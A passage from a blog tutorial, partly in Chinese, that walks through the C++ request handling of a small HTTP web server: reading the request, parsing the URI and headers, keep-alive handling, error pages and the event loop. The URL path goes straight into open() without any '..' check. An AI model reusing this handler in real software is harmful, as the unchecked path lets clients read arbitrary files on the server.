class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">HttpHandler::ERROR_TYPE <span class="title">HttpHandler::readRequest</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Clear data left over from the previous request</span></span><br><span class="line">    request_.<span class="built_in">clear</span>();</span><br><span class="line">    pos_ = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line">    <span class="type">char</span> buffer[MAXBUF];</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// Blocking read loop ------------------------------------------</span></span><br><span class="line">    <span class="keyword">for</span>(;;)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="type">ssize_t</span> len = <span class="built_in">readn</span>(client_fd_, buffer, MAXBUF, <span class="literal">true</span>, <span class="literal">true</span>);</span><br><span class="line">        <span class="keyword">if</span>(len &lt; <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">return</span> ERR_READ_REQUEST_FAIL;</span><br><span class="line">        <span class="comment">/** </span></span><br><span class="line"><span class="comment">         * If nothing was read this time but data was read earlier, stop reading.</span></span><br><span class="line"><span class="comment">         * Note that some connections are opened early without sending data right away, so the read must block and wait.</span></span><br><span 
class="comment">         * Pitfall: after every refresh, Chromium opens an extra connection to shorten the latency of the next request.</span></span><br><span class="line"><span class="comment">         * So idle connections are very likely here: the connection is established but no data is sent until the next request.</span></span><br><span class="line"><span class="comment">         * </span></span><br><span class="line"><span class="comment">         * If 0 bytes are read, the remote end has closed the connection.</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="keyword">else</span> <span class="keyword">if</span>(len == <span class="number">0</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// All data has already been read</span></span><br><span class="line">            <span class="keyword">if</span>(request_.<span class="built_in">length</span>() &gt; <span class="number">0</span>)</span><br><span class="line">                <span class="comment">// Stop reading</span></span><br><span class="line">                <span class="keyword">break</span>;</span><br><span class="line">            <span class="comment">// Nothing was read now and request_ is still empty, so the remote end has closed the connection</span></span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="keyword">return</span> ERR_CONNECTION_CLOSED;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// Append the bytes just read to the request</span></span><br><span class="line">        <span class="function">string <span class="title">request</span><span class="params">(buffer, buffer + len)</span></span>;</span><br><span class="line">        request_ += request;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// Reads are blocking, so a read shorter than the buffer is taken to mean the whole request has arrived</span></span><br><span class="line">        <span class="keyword">if</span>(<span class="built_in">static_cast</span>&lt;<span class="type">size_t</span>&gt;(len) &lt; MAXBUF)</span><br><span class="line"> 
           <span class="keyword">break</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="keyword">return</span> ERR_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="5-解析URI">5. Parsing the URI</h3><p>Next comes parsing of the HTTP request message. Let&#39;s first take a quick look at the request format:</p><p><img src="/2021/05/WebServer-1/image-20210507204906032.png" alt="image-20210507204906032"></p><p>First, we take the first line of the message that ends with <code>\r\n</code> and parse the <strong>request method</strong>, the <strong>target URL</strong>, and the <strong>HTTP version</strong> out of it. Any parse failure caused by a malformed message is reported as ERR_BAD_REQUEST.</p><p>Second, WebServer-1.0 currently supports only the GET method; any other method results in ERR_NOT_IMPLEMENTED.</p><p>The requested URL may point to a directory rather than a file. If it does, we append <code>/index.html</code> to the URL so that the target is always a file (even though that file may not exist).</p><p>Finally, WebServer-1.0 currently supports only HTTP/1.0 and HTTP/1.1, so any other HTTP version immediately results in ERR_HTTP_VERSION_NOT_SUPPORTED.</p><p>Putting this together, the final implementation looks like this:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span 
class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">HttpHandler::ERROR_TYPE <span class="title">HttpHandler::parseURI</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="keyword">if</span>(request_.<span class="built_in">empty</span>())   <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> pos1, pos2;</span><br><span class="line">    </span><br><span class="line">    pos1 = request_.<span class="built_in">find</span>(<span class="string">&quot;\r\n&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(pos1 == string::npos)    <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line">    string&amp;&amp; first_line = request_.<span class="built_in">substr</span>(<span class="number">0</span>, pos1);</span><br><span class="line">    <span class="comment">// a. 
查找get</span></span><br><span class="line">    pos1 = first_line.<span class="built_in">find</span>(<span class="string">&#x27; &#x27;</span>);</span><br><span class="line">    <span class="keyword">if</span>(pos1 == string::npos)    <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line">    method_ = first_line.<span class="built_in">substr</span>(<span class="number">0</span>, pos1);</span><br><span class="line"></span><br><span class="line">    string output_method = <span class="string">&quot;Method: &quot;</span>;</span><br><span class="line">    <span class="keyword">if</span>(method_ == <span class="string">&quot;GET&quot;</span>)</span><br><span class="line">        output_method += <span class="string">&quot;GET&quot;</span>;</span><br><span class="line">    <span class="keyword">else</span></span><br><span class="line">        <span class="keyword">return</span> ERR_NOT_IMPLEMENTED;</span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; output_method &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// b. 查找目标路径</span></span><br><span class="line">    pos1++;</span><br><span class="line">    pos2 = first_line.<span class="built_in">find</span>(<span class="string">&#x27; &#x27;</span>, pos1);</span><br><span class="line">    <span class="keyword">if</span>(pos2 == string::npos)    <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 获取path时,注意去除 path 中的第一个斜杠</span></span><br><span class="line">    pos1++;</span><br><span class="line">    path_ = first_line.<span class="built_in">substr</span>(pos1, pos2 - pos1);</span><br><span class="line">    <span class="comment">// 如果 path 为空,则添加一个 . 
表示当前文件夹</span></span><br><span class="line">    <span class="keyword">if</span>(path_.<span class="built_in">length</span>() == <span class="number">0</span>)</span><br><span class="line">        path_ += <span class="string">&quot;.&quot;</span>;</span><br><span class="line">    </span><br><span class="line">    <span class="comment">// 判断目标路径是否是文件夹</span></span><br><span class="line">    <span class="keyword">struct</span> <span class="title class_">stat</span> st;</span><br><span class="line">    <span class="keyword">if</span>(<span class="built_in">stat</span>(path_.<span class="built_in">c_str</span>(), &amp;st) == <span class="number">0</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="comment">// 如果试图打开一个文件夹,则添加 index.html</span></span><br><span class="line">        <span class="keyword">if</span> (<span class="built_in">S_ISDIR</span>(st.st_mode))</span><br><span class="line">            path_ += <span class="string">&quot;/index.html&quot;</span>;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;Path: &quot;</span> &lt;&lt; path_ &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// c. 
查看HTTP版本</span></span><br><span class="line">    <span class="comment">// NOTE 这里只支持 HTTP/1.0 和 HTTP/1.1</span></span><br><span class="line">    pos2++;</span><br><span class="line">    http_version_ = first_line.<span class="built_in">substr</span>(pos2, first_line.<span class="built_in">length</span>() - pos2);</span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;HTTP Version: &quot;</span> &lt;&lt; http_version_ &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 检测是否支持客户端 http 版本</span></span><br><span class="line">    <span class="keyword">if</span>(http_version_ != <span class="string">&quot;HTTP/1.0&quot;</span> &amp;&amp; http_version_ != <span class="string">&quot;HTTP/1.1&quot;</span>)</span><br><span class="line">        <span class="keyword">return</span> ERR_HTTP_VERSION_NOT_SUPPORTED;</span><br><span class="line">    <span class="comment">// 设置只在 HTTP/1.1时 允许 持续连接</span></span><br><span class="line">    <span class="keyword">if</span>(http_version_ != <span class="string">&quot;HTTP/1.1&quot;</span>)</span><br><span class="line">        isKeepAlive_ = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 更新pos_</span></span><br><span class="line">    pos_ = first_line.<span class="built_in">length</span>() + <span class="number">2</span>;</span><br><span class="line">    <span class="keyword">return</span> ERR_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="6-解析-HTTP-header">6. 
Parsing the HTTP header</h3><p>Starting from the second line of the HTTP message, each line terminated by <code>\r\n</code> holds one <code>key: value</code> pair (except the last, empty line of the header section). We therefore keep walking through the request data and store each HTTP header in the headers_ map. If an error occurs while parsing, ERR_BAD_REQUEST is returned.</p><p>One point deserves attention: HTTP/1.1 uses <strong>persistent connections</strong> by default, so the HttpHandler member isKeepAlive_ defaults to true. If the client sends the header <code>Connection: close</code>, however, the connection is not <strong>persistent</strong> and must be closed as soon as the current request has been handled. So when we receive <code>Connection: close</code>, isKeepAlive_ must be set to false. The implementation below is slightly stricter: any <code>Connection</code> value other than <code>keep-alive</code> sets isKeepAlive_ to false.</p><p>Putting this together, the final implementation is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br></pre></td><td class="code"><pre><span class="line"><span 
class="function">HttpHandler::ERROR_TYPE <span class="title">HttpHandler::parseHttpHeader</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    <span class="comment">// Clear headers left over from the previous request</span></span><br><span class="line">    headers_.<span class="built_in">clear</span>();</span><br><span class="line"></span><br><span class="line">    <span class="type">size_t</span> pos1, pos2;</span><br><span class="line">    <span class="keyword">for</span>(pos1 = pos_;</span><br><span class="line">        (pos2 = request_.<span class="built_in">find</span>(<span class="string">&quot;\r\n&quot;</span>, pos1)) != string::npos;</span><br><span class="line">        pos1 = pos2 + <span class="number">2</span>)</span><br><span class="line">    &#123;</span><br><span class="line">        string&amp;&amp; header = request_.<span class="built_in">substr</span>(pos1, pos2 - pos1);</span><br><span class="line">        <span class="comment">// An empty line marks the end of the HTTP header section</span></span><br><span class="line">        <span class="keyword">if</span>(header.<span class="built_in">size</span>() == <span class="number">0</span>)</span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        pos1 = header.<span class="built_in">find</span>(<span class="string">&#x27; &#x27;</span>);</span><br><span class="line">        <span class="keyword">if</span>(pos1 == string::npos || pos1 == <span class="number">0</span>)    <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line">        <span class="comment">// pos1 - 1 drops the trailing colon from the key (pos1 == 0 is rejected above, so this cannot underflow)</span></span><br><span class="line">        string&amp;&amp; key = header.<span class="built_in">substr</span>(<span class="number">0</span>, pos1 - <span class="number">1</span>);</span><br><span class="line">        <span class="comment">// Convert the key to lowercase</span></span><br><span class="line">        <span class="built_in">transform</span>(key.<span 
class="built_in">begin</span>(), key.<span class="built_in">end</span>(), key.<span class="built_in">begin</span>(), ::tolower);</span><br><span class="line">        <span class="comment">// 获取 value</span></span><br><span class="line">        string&amp;&amp; value = header.<span class="built_in">substr</span>(pos1 + <span class="number">1</span>);</span><br><span class="line"></span><br><span class="line">        <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;HTTP Header: [&quot;</span> &lt;&lt; key &lt;&lt; <span class="string">&quot; : &quot;</span> &lt;&lt; value &lt;&lt; <span class="string">&quot;]&quot;</span> &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">        headers_[key] = value;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 获取header完成后,处理一下 Connection 头</span></span><br><span class="line">    <span class="keyword">auto</span> conHeaderIter = headers_.<span class="built_in">find</span>(<span class="string">&quot;connection&quot;</span>);</span><br><span class="line">    <span class="keyword">if</span>(conHeaderIter != headers_.<span class="built_in">end</span>())</span><br><span class="line">    &#123;</span><br><span class="line">        string value = conHeaderIter-&gt;second;</span><br><span class="line">        <span class="built_in">transform</span>(value.<span class="built_in">begin</span>(), value.<span class="built_in">end</span>(), value.<span class="built_in">begin</span>(), ::tolower);</span><br><span class="line">        <span class="keyword">if</span>(value != <span class="string">&quot;keep-alive&quot;</span>)</span><br><span class="line">            isKeepAlive_ = <span class="literal">false</span>;</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="comment">// 判断处理空 header 条目的 \r\n</span></span><br><span class="line">    <span class="keyword">if</span>((request_.<span 
class="built_in">size</span>() &lt; pos1 + <span class="number">2</span>) || (request_.<span class="built_in">substr</span>(pos1, <span class="number">2</span>) != <span class="string">&quot;\r\n&quot;</span>))</span><br><span class="line">        <span class="keyword">return</span> ERR_BAD_REQUEST;</span><br><span class="line"></span><br><span class="line">    pos_ = pos1 + <span class="number">2</span>;</span><br><span class="line">    <span class="keyword">return</span> ERR_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="7-发送响应报文">7. Sending the response</h3><p>The HTTP response format is shown below:</p><p><img src="/2021/05/WebServer-1/image-20210507205312687.png" alt="image-20210507205312687"></p><p>Following this format, we simply build a message of the same shape and send it to the client.</p><p>One thing to note: whether the current connection stays open <strong>depends on the isKeepAlive_ variable</strong>. The implementation is as follows:</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">HttpHandler::ERROR_TYPE <span class="title">HttpHandler::sendResponse</span><span class="params">(<span class="type">const</span> string&amp; responseCode, <span class="type">const</span> string&amp; responseMsg, </span></span></span><br><span class="line"><span class="params"><span class="function"> 
                           <span class="type">const</span> string&amp; responseBodyType, <span class="type">const</span> string&amp; responseBody)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    stringstream sstream;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;HTTP/1.1&quot;</span> &lt;&lt; <span class="string">&quot; &quot;</span> &lt;&lt; responseCode &lt;&lt; <span class="string">&quot; &quot;</span> &lt;&lt; responseMsg &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;Connection: &quot;</span> &lt;&lt; (isKeepAlive_ ? <span class="string">&quot;Keep-Alive&quot;</span> : <span class="string">&quot;Close&quot;</span>) &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;Server: WebServer/1.0&quot;</span> &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;Content-length: &quot;</span> &lt;&lt; responseBody.<span class="built_in">size</span>() &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;Content-type: &quot;</span> &lt;&lt; responseBodyType &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; <span class="string">&quot;\r\n&quot;</span>;</span><br><span class="line">    sstream &lt;&lt; responseBody;</span><br><span class="line"></span><br><span class="line">    string&amp;&amp; response = sstream.<span class="built_in">str</span>();</span><br><span class="line">    <span class="type">ssize_t</span> len = <span class="built_in">writen</span>(client_fd_, (<span class="type">void</span>*)response.<span class="built_in">c_str</span>(), response.<span 
class="built_in">size</span>());</span><br><span class="line"></span><br><span class="line">    <span class="comment">// 输出返回的数据</span></span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;&lt;&lt;&lt;&lt;- Response Packet -&gt;&gt;&gt;&gt; &quot;</span> &lt;&lt; endl;</span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;&#123;&quot;</span> &lt;&lt; <span class="built_in">escapeStr</span>(response) &lt;&lt; <span class="string">&quot;&#125;&quot;</span> &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span>(len &lt; <span class="number">0</span> || <span class="built_in">static_cast</span>&lt;<span class="type">size_t</span>&gt;(len) != response.<span class="built_in">size</span>())</span><br><span class="line">        <span class="keyword">return</span> ERR_SEND_RESPONSE_FAIL;</span><br><span class="line">    <span class="keyword">return</span> ERR_SUCCESS;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="8-错误处理">8. 
错误处理</h3><p>当 handlerError 错误处理函数被调用时，在该函数内部将简单构建一个 html 错误提示页面，并将该页面发送至远程客户端。具体实现如下所示：</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">HttpHandler::ERROR_TYPE <span class="title">HttpHandler::handleError</span><span class="params">(<span class="type">const</span> string&amp; errCode, <span class="type">const</span> string&amp; errMsg)</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    string errStr = errCode + <span class="string">&quot; &quot;</span> + errMsg;</span><br><span class="line">    string responseBody = </span><br><span class="line">                <span class="string">&quot;&lt;html&gt;&quot;</span></span><br><span class="line">                <span class="string">&quot;&lt;title&gt;&quot;</span> + errStr + <span class="string">&quot;&lt;/title&gt;&quot;</span></span><br><span class="line">                <span class="string">&quot;&lt;body&gt;&quot;</span> + errStr + </span><br><span class="line">                    <span class="string">&quot;&lt;hr&gt;&lt;em&gt; Kiprey&#x27;s Web Server&lt;/em&gt;&quot;</span></span><br><span class="line">                <span class="string">&quot;&lt;/body&gt;&quot;</span></span><br><span class="line">                <span class="string">&quot;&lt;/html&gt;&quot;</span>;</span><br><span class="line">    <span class="keyword">return</span> <span class="built_in">sendResponse</span>(errCode, errMsg, <span class="string">&quot;text/html&quot;</span>, responseBody);</span><br><span 
class="line">&#125;</span><br></pre></td></tr></table></figure><h3 id="9-事件循环（重要）">9. Event Loop (Important)</h3><p>The RunEventLoop function in HttpHandler maintains the event loop for the whole connection. It works as follows:</p><ul><li>First, because HTTP/1.1 supports persistent connections, control flow enters a while loop that repeatedly <strong>reads a request and sends a response</strong>.</li><li>Inside the while loop, the data from the client is read first, and then the URI and the HTTP headers are parsed. If any of these steps fails, the corresponding error page is sent to the client, or the loop exits and the connection is closed.</li><li>If none of the steps above fails, the target file is opened, mapped into memory with mmap, read, and sent to the remote client. If the target file does not exist, a 404 error is returned; if mapping the file fails, a 500 error is returned.</li><li>Finally, control returns to the top of the while loop to wait for the next request.</li></ul>
<figure class="highlight cpp"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="type">void</span> <span class="title">HttpHandler::RunEventLoop</span><span class="params">()</span></span></span><br><span class="line"><span class="function"></span>&#123;</span><br><span class="line">    ERROR_TYPE err_ty;</span><br><span class="line">    <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;------------------- New Connection -------------------&quot;</span> &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Print connection info</span></span><br><span class="line">    <span class="built_in">printConnectionStatus</span>();</span><br><span class="line"></span><br><span class="line">    <span class="comment">// Persistent connection</span></span><br><span class="line">    <span class="keyword">while</span>(isKeepAlive_)</span><br><span class="line">    &#123;</span><br><span class="line">        <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;&lt;&lt;&lt;&lt;- Request Packet -&gt;&gt;&gt;&gt; &quot;</span> &lt;&lt; endl;</span><br><span class="line">        <span class="comment">// Read the request from the socket; leave the loop on a read failure or a closed connection</span></span><br><span class="line">        <span class="comment">// NOTE readRequest must read the entire HTTP message here</span></span><br><span class="line">        <span class="keyword">if</span>((err_ty = <span class="built_in">readRequest</span>()) != ERR_SUCCESS)</span><br><span class="line">        
&#123;</span><br><span class="line">            <span class="keyword">if</span>(err_ty == ERR_READ_REQUEST_FAIL)</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Read request failed ! &quot;</span> &lt;&lt; <span class="built_in">strerror</span>(errno) &lt;&lt; endl;</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span>(err_ty == ERR_CONNECTION_CLOSED)</span><br><span class="line">                <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;Socket(&quot;</span> &lt;&lt; client_fd_ &lt;&lt; <span class="string">&quot;) was closed.&quot;</span> &lt;&lt; endl;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="built_in">assert</span>(<span class="number">0</span> &amp;&amp; <span class="string">&quot;UNREACHABLE&quot;</span>);       </span><br><span class="line">            <span class="comment">// 断开连接     </span></span><br><span class="line">            <span class="keyword">break</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;&#123;&quot;</span> &lt;&lt; <span class="built_in">escapeStr</span>(request_) &lt;&lt; <span class="string">&quot;&#125;&quot;</span> &lt;&lt; endl;</span><br><span class="line">        </span><br><span class="line">        <span class="comment">// 解析信息 ------------------------------------------</span></span><br><span class="line">        <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;&lt;&lt;&lt;&lt;- Request Info -&gt;&gt;&gt;&gt; &quot;</span> &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 1. 
先解析第一行</span></span><br><span class="line">        <span class="keyword">if</span>((err_ty = <span class="built_in">parseURI</span>()) != ERR_SUCCESS)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span>(err_ty == ERR_NOT_IMPLEMENTED)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Request method is not implemented.&quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;501&quot;</span>, <span class="string">&quot;Not Implemented&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span>(err_ty == ERR_HTTP_VERSION_NOT_SUPPORTED)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Request HTTP Version Not Supported.&quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;505&quot;</span>, <span class="string">&quot;HTTP Version Not Supported&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span> <span class="keyword">if</span>(err_ty == ERR_BAD_REQUEST)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Bad Request.&quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;400&quot;</span>, <span class="string">&quot;Bad Request&quot;</span>);</span><br><span class="line">            &#125;</span><br><span 
class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="built_in">assert</span>(<span class="number">0</span> &amp;&amp; <span class="string">&quot;UNREACHABLE&quot;</span>); </span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 2. 解析每一条http header</span></span><br><span class="line">        <span class="keyword">if</span>((err_ty = <span class="built_in">parseHttpHeader</span>()) != ERR_SUCCESS)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="keyword">if</span>(err_ty == ERR_BAD_REQUEST)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Bad Request.&quot;</span> &lt;&lt; endl;</span><br><span class="line">                <span class="built_in">handleError</span>(<span class="string">&quot;400&quot;</span>, <span class="string">&quot;Bad Request&quot;</span>);</span><br><span class="line">            &#125;</span><br><span class="line">            <span class="keyword">else</span></span><br><span class="line">                <span class="built_in">assert</span>(<span class="number">0</span> &amp;&amp; <span class="string">&quot;UNREACHABLE&quot;</span>); </span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;</span><br><span class="line">        <span class="comment">// 3. 
输出剩余的 HTTP body</span></span><br><span class="line">        <span class="built_in">LOG</span>(INFO) &lt;&lt; <span class="string">&quot;HTTP Body: &#123;&quot;</span> </span><br><span class="line">                &lt;&lt; <span class="built_in">escapeStr</span>(request_.<span class="built_in">substr</span>(pos_, request_.<span class="built_in">length</span>() - pos_)) </span><br><span class="line">                &lt;&lt; <span class="string">&quot;&#125;&quot;</span> &lt;&lt; endl;</span><br><span class="line"></span><br><span class="line">        <span class="comment">// 发送目标数据 ------------------------------------------</span></span><br><span class="line"></span><br><span class="line">        <span class="comment">// 试图打开一个文件</span></span><br><span class="line">        <span class="type">int</span> file_fd;</span><br><span class="line">        <span class="keyword">if</span>((file_fd = <span class="built_in">open</span>(path_.<span class="built_in">c_str</span>(), O_RDONLY, <span class="number">0</span>)) == <span class="number">-1</span>)</span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 如果打开失败,则返回404</span></span><br><span class="line">            <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;File [&quot;</span> &lt;&lt; path_ &lt;&lt; <span class="string">&quot;] open failed ! 
&quot;</span> &lt;&lt; <span class="built_in">strerror</span>(errno) &lt;&lt; endl;</span><br><span class="line">            <span class="built_in">handleError</span>(<span class="string">&quot;404&quot;</span>, <span class="string">&quot;Not Found&quot;</span>); </span><br><span class="line">            <span class="keyword">continue</span>;</span><br><span class="line">        &#125;  </span><br><span class="line">        <span class="keyword">else</span></span><br><span class="line">        &#123;</span><br><span class="line">            <span class="comment">// 获取目标文件的大小</span></span><br><span class="line">            <span class="keyword">struct</span> stat st;</span><br><span class="line">            <span class="keyword">if</span>(<span class="built_in">stat</span>(path_.<span class="built_in">c_str</span>(), &amp;st) == <span class="number">-1</span>)</span><br><span class="line">            &#123;</span><br><span class="line">                <span class="built_in">LOG</span>(ERROR) &lt;&lt; <span class="string">&quot;Can not get file [&quot;</span> &lt;&lt; path_ &lt;&lt; <span class="string">&quot;] state ! 
